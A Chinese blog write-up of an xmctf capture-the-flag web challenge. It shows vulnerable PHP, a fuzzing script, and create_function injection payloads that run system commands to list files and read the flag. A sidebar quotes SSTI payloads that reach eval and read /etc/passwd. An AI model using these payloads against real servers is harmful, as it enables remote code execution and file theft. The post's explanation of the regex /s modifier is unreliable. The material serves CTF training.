xmctf-web-easy-web-wp

最新推荐文章于 2024-05-29 17:38:19 发布
最新推荐文章于 2024-05-29 17:38:19 发布
阅读量192 收藏
点赞数
CC 4.0 BY-SA版权
分类专栏: ctf记录
><本博客上原创文章未经本人许可,不得用于商业用途。转载请注明出处,否则保留追究法律责任的权利。><
本文链接:https://blog.youkuaiyun.com/weixin_46439278/article/details/118216907
本文介绍了一个包含PHP安全漏洞的示例代码,并展示了如何通过构造特定的输入绕过正则表达式检查来触发潜在的安全问题。文章还提供了使用create_function进行攻击的payload示例。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

easy-web

源代码

源代码贴上,如下:

 <?php
show_source(__FILE__);
$key = "bad";
extract($_POST);
if($key === 'bad'){
    die('badbad!!!');
}
$act = @$_GET['act'];
$arg = @$_GET['arg'];
if(preg_match('/^[a-z0-9_]*$/isD',$act)) {
    echo 'check';
} else {
    $act($arg,'');
}

echo '666';
badbad!!!

函数

函数名描述
show_source()
highlight_file()		语法高亮
extract()从数组中将变量导入到当前的符号表。
使用数组键名作为变量名,使用数组键值作为变量值。
针对数组中的每个元素,将在当前符号表中创建对应的一个变量。
该函数返回成功设置的变量数目。

正则表达式

pattern描述
/i不区分大小写
/s匹配任何不可见字符,包括空格、制表符、换页符等等,等价于[\f\n\r\t\v]
/D如果使用$限制结尾字符,则不允许结尾有换行

绕过

fuzz

import requests
data={'key':123}#任意post一个key
for i in range(1,256):
    h=hex(i)[2:]
    if len(h)<2:
        h='0'+h
    h='%'+h
    url='http://447-9fedb10a-22a3-46e0-a47a-06f5fd752e54.xmctf.top:8849/?act='+h+'var_dump&arg=111'
    r=requests.post(url,data=data)
    if '111' in r.text:
        print(h)
        break

create_function()

使用匿名函数来饶过正则表达式

payload

# 原始
act=\create_function&arg=){}要执行的代码;//
# 列出当前目录下的文件
act=\create_function&arg=){return 123;}system('ls .../');//
# 查看flag
act=\create_function&arg=){return 123;}system('cat /ffflll4g');//
BUUCTF WEB [安洵杯 2019]easy_web 1 WP
Whaocai的博客
08-02 1612
考点: md5强碰撞 php代码审计–正则表达式 F12看到md5 is funny~ ,猜测与md5算法有关。注意到<img>标签和url地址栏,img参数是文件名的某种加密后的,将读取到的文件内容base64加密之后,输出到img标签中。 这个时候,要想办法知道img参数是怎么加密的,查看wp之后,发现后端会对传进去的img参数先进行两次base64解密,再进行一次hex解密。所以我们在payload时要先进行一次hex加密,再进行两次base64加密 同理然后读取一下index.php,再
SSTI模板注入及绕过姿势(基于Python-Jinja2)
热门推荐
Y4tacker的博客
08-02 1万+
http://xmctf.top:8962/?name={{%22%22[%22\x5f\x5fclass\x5f\x5f%22]["\x5F\x5Fbase\x5F\x5F"]["\x5F\x5Fsubclasses\x5F\x5F"]()[233]["\x5F\x5Finit\x5F\x5F"]["\x5F\x5Fglobals\x5F\x5F"]["\x5F\x5Fbuiltins\x5F\x5F"]['eval']("\x5F\x5Fimport\x5F\x5F('os'))")}}
qsnctf easy_web wp
arcuied
11-10 666
qsnctf easy_web wp
xmctf-web-web4-wp
居上
06-25 220
web4 好几个四季了,我在等我的主人回来 key:e086aa137fa19f67d27b39d0eca18610 key扔cmd5解出1.1.1.1,可能为IP地址,放到请求头 X-Forwarded-For: 1.1.1.1 提示存在dhudndrgrhs.php,访问得到源代码 源代码 <?php show_source(__FILE__); error_reporting(0); $disable_fun = ["assert","print_r","system", "shell_ex
xmctf-web-web8-wp
居上
06-25 325
web8 考点 SSTI flask 根据提示,需要以admin的方式访问flag。携带当前session访问flag不能成功的。 传参数name={{7*7}},发现是SSTI。 然后传参?name={{config}}可以查看到,secret_key 后端使用的是flash框架。 先安装pip install flask-unsign[wordlist] 。 然后在浏览器中复制当前session flask-unsign --decode --cookie "eyJ1c2VybmFtZSI
xmctf-web-web11-wp
居上
06-25 128
web11 后端仍然使用的是flask,然后同时也存在SSTI。但是过滤了一些字符。 经过fuzz之后发现过滤了一些字符如 . _ arg payload #get传入 ?name={{ ()|attr(request['values']['x1'])|attr(request['values']['x2'])| attr(request['values']['x3'])()|attr(request['values']['x6'])(233)| attr(request['values']['x4'])|
[SUCTF 2019]EasyWeb
Yb_140的博客
12-04 781
文件上传
xmctf web3-考核
Sk1y的博客
08-12 196
php session工作原理,session反序列化。
[RoarCTF] web easy_calc wp
Vicl1fe的博客
10-21 657
参考链接:[传送门](https://mp.weixin.qq.com/s/iyzOKWbLqDX5Y6Fad5Exmw) CTF讨论群:946220807 wp 一种熟悉的感觉。 相信很多人都遇到个问题。只要num传入字母。就会403。然后一脸懵逼的做下一道题,/xyx。这是因为有waf,匹配num的值是否为数字。首先得先绕过这个waf。 bypass:https://www.freebuf....
BUUCTF - Web - easy_serialize_php
1tachi的博客
12-07 536
文章目录源码分析知识点payload其他解法 源码 <?php $function = @$_GET['f']; function filter($img){ $filter_arr = array('php','flag','php5','php4','fl1g'); $filter = '/'.implode('|',$filter_arr).'/i'; return preg_replace($filter,'',$img); } if($_SESSION){
题目讲解3
aetlypdlg_ys的博客
05-18 596
id等于这玩意儿是因为$_SESSION['tokennum']没有什么东西,就直接让id=md5($_SESSION['tokennum'])就行,d41d8cd98f00b204e9800998ecf8427e这一串就是$_SESSION['tokennum']的md5加密。potin1k就是绕过addslashes,构造查看ae86qfC.php的内容。1{${highlight_file( 中的1是为了满足 if (intval,只要是数字开头的字符串就会返回数字,如果是纯字符串返回0。
buuoj、xmctf、攻防世界刷题(web)write up
Love&Share
06-14 1万+
BUUOJ-每天两道,告别烦恼 WEB: [GXYCTF2019]BabySQli 输入用户名admin,发现可以登入,其他显示wrong user 源码中发现,存在base编码 先base32再base64解码,发现sql语句尝试去注入 首先尝试万能密码: 发现被拦截 尝试手工注入: 一个联合注入新知识 在联合查询并不存在的数据时,联合查询就会构造一个虚拟的数据。 下面是一个自己的本地环境 数据库原本这几个用户名和密码 执行select * from flag WHERE username
xmctf web4-考核
羽的博客
07-07 1425
web4-考核 根据提示key:e086aa137fa19f67d27b39d0eca18610猜测为md5值,解密得到1.1.1.1 在请求头中添加 X-Forwarded-For:1.1.1.1得到一个地址dhudndrgrhs.php内容如下 <?php show_source(__FILE__); error_reporting(0); $disable_fun = ["assert","print_r","system", "shell_exec","ini_set", "scandir",
xmctf web12-考核(无参数RCE)
羽的博客
07-07 1419
web12-考核 无参数RCE <?php header("Content-Type: text/html;charset=utf-8"); include "flag.php"; echo "flag在哪里呢?<br>"; highlight_file(__FILE__); error_reporting(0); if(isset($_GET['exp'])){ if (!preg_match('/data:\/\/|filter:\/\/|php:\/\/|phar:\/\//
XMCTF内部赛 part1
羽的博客
07-07 2163
web3-考核 <?php highlight_file(__FILE__); $content = @$_GET['content'] ? "---mylocalnote---\n" . $_GET['content'] : ""; $name = @$_GET['name'] ? $_GET['name'] : ''; str_replace('/', '', $name); str_replace('\\', '', $name); file_put_contents("/tmp/" . $na
XCTF web新手练习区_1-12
H4ppyD0g的博客
07-15 2576
view_source 查看网页源码的方法: (1) F12(如果只按F12没反应,就功能键+F12)可以查看网页源码。 (2) 网页源码的url以view-source: 开头。在本网页的url前面加上这个可以获取。 (3) 通过python的requests.get()可以获取网页源码。 ———————————— get_post ...
XCTF系列 // Web | easytornado
qq_45805420的博客
08-08 1263
前言 本题涉及到的知识点有,Tornado 的 SSTI 漏洞、Tornado 中的 cookie_secret 值 以及 Python3 中的 hashlib 模块。 首先大概的介绍一下 Tornado 的相关概念。 Tornado Tornado 是使用 Python 开发的全栈式(full-stack)Web 框架和异步网络库。与以前提到过的 Flask 一样都是 Python 的一种 Web 开发框架。 Tornado render 模板注入 Tornado render 是 Python 中的一个
xmctf web11-考核(模板注入绕过)
羽的博客
06-27 976
web11-考核(模板注入绕过) 输入name=1发现存在回显,猜测为模板注入,经过测试发现过滤了 . _ 和一些关键字 py2模板注入常见payload ().__class__.__bases__[0].__subclasses__()[40](r'/etc/passwd').read() ().__class__.__bases__[0].__subclasses__()[59].__init__.func_globals.values()[13]['eval']('__import__("os").
ctfshow元旦水友赛 easy_web(进一步解释)
最新发布
2301_80240388的博客
05-29 1442
刷题时看到有大佬已经有wp了,但其中有些东西并不能让我很好的理解,特写一篇文章来补全一下大佬wp#预期解法。
XCTF-WEB
qq_43661408的博客
06-22 554
post和get 题目链接:http://111.198.29.45:34348/ 解题思路 首先使用 get方式提交变量a等于1 即 http://111.198.29.45:34348/?a=1 得到 第二条信息 需要使用post提交一个变量b值为2 因此使用火狐自带的插件hackbar,但是现在火狐更新后不能使用了,替代hackbar的插件有了 Max hackbar 和 hackbar q...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值